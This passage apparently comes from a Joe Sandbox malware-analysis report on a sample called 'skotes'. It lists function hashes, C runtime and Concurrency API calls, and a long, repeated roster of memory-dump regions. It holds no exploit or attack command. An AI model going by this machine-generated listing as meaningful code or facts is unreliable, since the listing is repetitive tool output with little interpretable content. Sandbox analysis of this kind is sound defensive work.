                                                                                                                                                                • Opcode Fuzzy Hash: 59b3e6d497f97d937b2dc59740113be195fb3072a4e7a4720f1f14e23b73d03e
                                                                                                                                                                • Instruction Fuzzy Hash: F4C1CF71D047089BDF24DFB4D945BAABBF4EF05310F0045BEE81697692EB31A908CB61
                                                                                                                                                                APIs
                                                                                                                                                                • ListArray.LIBCONCRT ref: 00BA4538
                                                                                                                                                                • ListArray.LIBCONCRT ref: 00BA456C
                                                                                                                                                                • Hash.LIBCMT ref: 00BA45D5
                                                                                                                                                                • Hash.LIBCMT ref: 00BA45E5
                                                                                                                                                                  • Part of subcall function 00BA9C41: std::bad_exception::bad_exception.LIBCMT ref: 00BA9C63
                                                                                                                                                                • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00BA474B
                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00BA47A4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ArrayHashList$AsyncConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLibraryLoadRegisterTimerstd::bad_exception::bad_exception
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3010677857-0
                                                                                                                                                                • Opcode ID: 3820e537e201f8d10efdf190a1443c565702f336f5dcb6ef61e809059cbc7a39
                                                                                                                                                                • Instruction ID: 12b4d1d10a4b9560bfc06ce245d8aac364f7fec32802c6ab4653e6f7376bb640
                                                                                                                                                                • Opcode Fuzzy Hash: 3820e537e201f8d10efdf190a1443c565702f336f5dcb6ef61e809059cbc7a39
                                                                                                                                                                • Instruction Fuzzy Hash: 808184B0A15B52BAD708DF78C885BD9FAE8FF4A710F10025AF428D7241DBB4A564CBD0
                                                                                                                                                                APIs
                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00B9ECED
                                                                                                                                                                • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00B9ED17
                                                                                                                                                                  • Part of subcall function 00B9F3DD: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00B9F3FA
                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00B9ED53
                                                                                                                                                                • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 00B9ED94
                                                                                                                                                                • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00B9EDC6
                                                                                                                                                                • __freea.LIBCMT ref: 00B9EDEC
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16__freea
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1319684358-0
                                                                                                                                                                • Opcode ID: 670889f0692f553abbb5428c0efc69431f93d3298f222455ebd254cb53290f14
                                                                                                                                                                • Instruction ID: 782001ff08d12e5f874bc7e3de2a12ab312678909c15955bd156124e37fa7e23
                                                                                                                                                                • Opcode Fuzzy Hash: 670889f0692f553abbb5428c0efc69431f93d3298f222455ebd254cb53290f14
                                                                                                                                                                • Instruction Fuzzy Hash: F63169B1A002168BCF15DFA8C9816ADB7F5EF49310B6440BAE865F7351DB35DE02CBA4
                                                                                                                                                                APIs
                                                                                                                                                                • _SpinWait.LIBCONCRT ref: 00B9EEBC
                                                                                                                                                                • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 00B9EEC8
                                                                                                                                                                • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00B9EEE1
                                                                                                                                                                • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00B9EF0F
                                                                                                                                                                • Concurrency::Context::Block.LIBCONCRT ref: 00B9EF31
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1182035702-0
                                                                                                                                                                • Opcode ID: 9d914b33c855945ee096f52f15883f8a34ee6bb24a05b6f16aaf260af8395343
                                                                                                                                                                • Instruction ID: 39671537e4a6cb25b2d2a602a9e744da8941d7ba6b74a7c443ef5036bab56279
                                                                                                                                                                • Opcode Fuzzy Hash: 9d914b33c855945ee096f52f15883f8a34ee6bb24a05b6f16aaf260af8395343
                                                                                                                                                                • Instruction Fuzzy Hash: E6216D70C146199BEF28EFA4C8457EEBBF0FF15360F2009BAE061A61D1E7719A44CB55
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
